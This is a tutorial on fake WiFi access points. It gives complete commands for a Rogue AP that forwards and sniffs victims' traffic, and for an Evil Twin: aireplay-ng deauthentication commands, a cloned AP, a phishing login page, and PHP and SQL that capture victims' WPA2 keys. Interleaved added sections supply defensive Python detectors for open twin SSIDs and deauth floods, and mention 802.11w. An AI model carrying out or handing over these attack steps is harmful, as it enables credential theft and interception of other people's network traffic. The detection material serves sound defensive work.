Fake Access Point

A fake AP can be used for many evil purposes, such as sniffing credentials (Rogue AP) or requesting credentials (Evil Twin).

1. Rogue AP
You set up an open WiFi AP and have a parallel connection to the internet. When a victim connects to your AP, you simply forward its traffic to the internet and sniff it on the way.

0. Find out all the data you need for setting up the AP (channel) and for connecting to the internet (SSID).

$ iwlist wlan0 scanning

1. Get a second network interface, e.g. a WiFi stick, ethernet or a virtual WiFi interface (used here).

$ service network-manager stop
$ ifconfig wlan0 down

$ iw phy phy0 interface add new0 type station
$ iw phy phy0 interface add new1 type __ap

$ ifconfig new0 down
$ ifconfig new1 down
$ macchanger --mac 00:11:22:33:44:55 new0
$ macchanger --mac 00:11:22:33:44:66 new1
$ ifconfig new0 up
$ ifconfig new1 up

2. Connect one network interface to the internet (ethernet or wireless)

$ wpa_passphrase <SSID> > wpa_sup.conf
# Enter: WPA2-Key (wpa_passphrase reads the passphrase from stdin)

$ wpa_supplicant -B -D nl80211 -i new0 -c wpa_sup.conf
$ dhclient new0

3. Create an AP on the other network interface (wireless)

$ echo "interface=new1
driver=nl80211
ssid=Free-WiFi
channel=<CHANNEL>" > hostapd.conf

$ ifconfig new1 10.0.0.1 up
$ hostapd hostapd.conf

4. Set up DHCP for the network interface that acts as the AP

$ echo "interface=new1
dhcp-range=10.0.0.10,10.0.0.250,infinite
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8" > dnsmasq.conf

$ route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
$ dnsmasq -C dnsmasq.conf -d

5. Forward the network traffic (victim <--> internet)

$ iptables --table nat --append POSTROUTING --out-interface new0 -j MASQUERADE
$ iptables --append FORWARD --in-interface new1 -j ACCEPT
$ echo 1 > /proc/sys/net/ipv4/ip_forward

2. Evil Twin
You set up an open WiFi AP with the same SSID as another one and broadcast deauth packets. When a victim connects to your AP, you route it to your fake backend, which requests credentials.

This time it's not necessary to have an internet connection, because you fake the backend with a local Apache/MySQL service. The AP has to look like the AP you want to mirror, which means the same MAC, SSID and channel. Route the traffic from the victim to the PHP website you created. After a deauthentication attack you just have to wait until a victim connects to your fake AP and enters the WLAN login that your website requests. Now you can simply query the MySQL database for the saved WPA2 key. By the way, if you are too lazy to do this on your own, you can just use a tool like Fluxion.
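Both setups above leave a footprint in a plain scan from a client's point of view: the Rogue AP is an open network (the page's "Free-WiFi"), and the Evil Twin is a known SSID that suddenly also shows up without encryption. The following is an added example, not part of the original page: it parses the output format of `iwlist wlan0 scanning` (the command used in step 0) and reports those two shapes. The scan text, BSSIDs and network names are constructed for the demonstration; the finding names (OPEN_TWIN, OPEN_NETWORK, MULTI_BSSID) are my own labels.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of `iwlist wlan0 scanning` output (not a real capture):
# "HomeNet" is a WPA2 network that also appears as an open network on the same channel
# under a second BSSID, "CoffeeShop" is a normal two-AP deployment and "Free-WiFi" is a
# plain open network.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=70/70  Signal level=-40 dBm
                    Encryption key:on
                    ESSID:"HomeNet"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 02 - Address: 00:11:22:33:44:66
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=70/70  Signal level=-25 dBm
                    Encryption key:off
                    ESSID:"HomeNet"
          Cell 03 - Address: AA:BB:CC:DD:EE:01
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=50/70  Signal level=-60 dBm
                    Encryption key:on
                    ESSID:"CoffeeShop"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 04 - Address: AA:BB:CC:DD:EE:02
                    Channel:1
                    Frequency:2.412 GHz (Channel 1)
                    Quality=50/70  Signal level=-62 dBm
                    Encryption key:on
                    ESSID:"CoffeeShop"
                    IE: IEEE 802.11i/WPA2 Version 1
          Cell 05 - Address: DE:AD:BE:EF:00:01
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=60/70  Signal level=-50 dBm
                    Encryption key:off
                    ESSID:"Free-WiFi"
"""

CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")


def parse_iwlist(text):
    """Turn iwlist scan output into a list of cells (bssid, channel, encrypted, essid)."""
    cells = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = CELL_RE.match(line)
        if m:
            current = {"bssid": m.group(1).upper(), "channel": None,
                       "encrypted": None, "essid": None}
            cells.append(current)
        elif current is None:
            continue                      # header line before the first cell
        elif line.startswith("Channel:"):
            current["channel"] = int(line.split(":", 1)[1])
        elif line.startswith("Encryption key:"):
            current["encrypted"] = line.split(":", 1)[1].strip() == "on"
        elif line.startswith("ESSID:"):
            current["essid"] = line.split(":", 1)[1].strip().strip('"')
    return cells


def find_suspicious_aps(cells):
    """Return (kind, essid, bssid, channel) findings, sorted by ESSID.

    OPEN_TWIN    - an SSID seen both protected and open: the evil-twin shape
    OPEN_NETWORK - any other open network, e.g. a rogue "Free-WiFi" hotspot
    MULTI_BSSID  - one SSID on several BSSIDs with consistent security
                   (usually a legitimate multi-AP network; reported for context)
    """
    by_essid = defaultdict(list)
    for c in cells:
        if c["essid"]:                    # hidden networks have an empty ESSID
            by_essid[c["essid"]].append(c)

    findings = []
    for essid, group in sorted(by_essid.items()):
        protected = [c for c in group if c["encrypted"] is True]
        open_ = [c for c in group if c["encrypted"] is False]
        if protected and open_:
            for c in open_:
                findings.append(("OPEN_TWIN", essid, c["bssid"], c["channel"]))
        elif open_:
            for c in open_:
                findings.append(("OPEN_NETWORK", essid, c["bssid"], c["channel"]))
        elif len({c["bssid"] for c in group}) > 1:
            findings.append(("MULTI_BSSID", essid, None, None))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_aps(parse_iwlist(SAMPLE_SCAN)):
        print(*finding)
```

The encryption mismatch is the reliable signal here, not the number of BSSIDs: enterprise networks legitimately advertise one SSID from many APs (the CoffeeShop case), whereas a protected SSID that also appears open is exactly the twin the page describes. If the twin additionally clones the BSSID, a single scan may only keep one entry per BSSID/SSID pair, so compare successive scans and watch for the same BSSID flipping between "Encryption key:on" and "off".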

1. Setup website (/var/www/html/) and database

createdb.sql:

CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass';
GRANT ALL PRIVILEGES ON *.* TO 'user'@'localhost';
FLUSH PRIVILEGES;

CREATE DATABASE WiFiKeysDB;
USE WiFiKeysDB;
CREATE TABLE WiFiKeys (wifikey VARCHAR(128));

Login page (HTML form served from /var/www/html/):

<html>
<head><title>WiFi-Login</title></head>
<body>
  <form action="writekey.php" method="post">
    WiFi-Key: <input type="text" name="wifikey">
    <input type="submit" value="Submit">
  </form>
</body>
</html>

writekey.php (stores the submitted key in the database):

<?php
  // key the victim typed into the form
  $wifikey = $_POST['wifikey'];
  try {
    $pdo = new PDO('mysql:host=localhost;dbname=WiFiKeysDB', 'user', 'pass');
    $stm = $pdo->prepare('INSERT INTO WiFiKeys (wifikey) VALUES (?)');
    $stm->execute(array($wifikey));
    echo "Success";
  } catch (PDOException $e) {
    echo "Failure: " . $e->getMessage();
  }
?>

$ service mysql start
$ mysql -p < createdb.sql
$ service apache2 start

2. Setup mirrored AP, DHCP and Routing
See above, but with mirrored data from the victim AP.

3. Add Routing to your local website

$ iptables -t nat -A PREROUTING -p tcp --dport 80 \
-j DNAT --to-destination <LOCAL_IP>:80

4. Deauth clients from the victim AP

# all clients
$ aireplay-ng -0 5 -a <MAC_Router> <INTERFACE_AP>

# specific client
$ aireplay-ng -0 5 -a <MAC_Router> -c <MAC_Client> <INTERFACE_AP>
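The deauth step is what a wireless IDS watches for on the defending side: a single deauthentication frame is normal (an AP dropping an idle client), a burst of them from one BSSID is not. The following is an added example, not part of the original page: a sliding-window detector over a constructed one-line-per-frame summary of the kind a monitor-mode capture can be reduced to. The line format, the MAC addresses and the threshold of 10 frames in 2 seconds are my assumptions, chosen so that a burst stands out against normal management traffic.

```python
from collections import defaultdict, deque

# Constructed frame summary (not a real capture): "<epoch seconds> <subtype> <src MAC> -> <dst MAC>".
# It contains normal beacons, one isolated deauth (an AP dropping an idle client) and a burst
# of 60 broadcast deauth frames from the BSSID 00:11:22:33:44:55 within 0.6 s.
SAMPLE_FRAMES = (
    "1700000000.000 beacon 00:11:22:33:44:55 -> ff:ff:ff:ff:ff:ff\n"
    "1700000000.102 beacon 00:11:22:33:44:55 -> ff:ff:ff:ff:ff:ff\n"
    "1700000000.150 deauth AA:BB:CC:DD:EE:01 -> 66:77:88:99:AA:BB\n"
    "1700000000.205 beacon 00:11:22:33:44:55 -> ff:ff:ff:ff:ff:ff\n"
    + "".join(f"1700000001.{i * 10:03d} deauth 00:11:22:33:44:55 -> ff:ff:ff:ff:ff:ff\n"
              for i in range(60))
    + "1700000002.000 beacon 00:11:22:33:44:55 -> ff:ff:ff:ff:ff:ff\n"
)


def parse_frames(text):
    """Parse the summary lines into (timestamp, subtype, src, dst) tuples."""
    frames = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, subtype, src, _arrow, dst = line.split()
        frames.append((float(ts), subtype.lower(), src.upper(), dst.upper()))
    return frames


def detect_deauth_flood(frames, threshold=10, window=2.0):
    """Flag every source that sends >= threshold deauth frames within `window` seconds.

    Returns {src_mac: {"first": ts, "peak": count, "broadcast": bool}} where `first`
    is the timestamp at which the threshold was crossed, `peak` the highest count seen
    in one window and `broadcast` whether frames were addressed to ff:ff:ff:ff:ff:ff
    (the "all clients" variant) rather than to a single station.
    """
    recent = defaultdict(deque)           # src -> timestamps of its recent deauth frames
    alerts = {}
    for ts, subtype, src, dst in frames:
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:   # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            entry = alerts.setdefault(src, {"first": ts, "peak": 0, "broadcast": False})
            entry["peak"] = max(entry["peak"], len(q))
            entry["broadcast"] = entry["broadcast"] or dst == "FF:FF:FF:FF:FF:FF"
    return alerts


if __name__ == "__main__":
    for src, info in detect_deauth_flood(parse_frames(SAMPLE_FRAMES)).items():
        print(f"deauth flood from {src}: {info['peak']} frames in one window, "
              f"broadcast={info['broadcast']}, first at {info['first']:.3f}")
```

The single deauth from AA:BB:CC:DD:EE:01 never reaches the threshold and is not reported, while the burst from 00:11:22:33:44:55 is, together with the fact that it targets all clients. Detection only tells you the attack is happening; the mitigation is 802.11w (Protected Management Frames), which makes clients discard deauthentication frames that were not sent by the AP they are associated with.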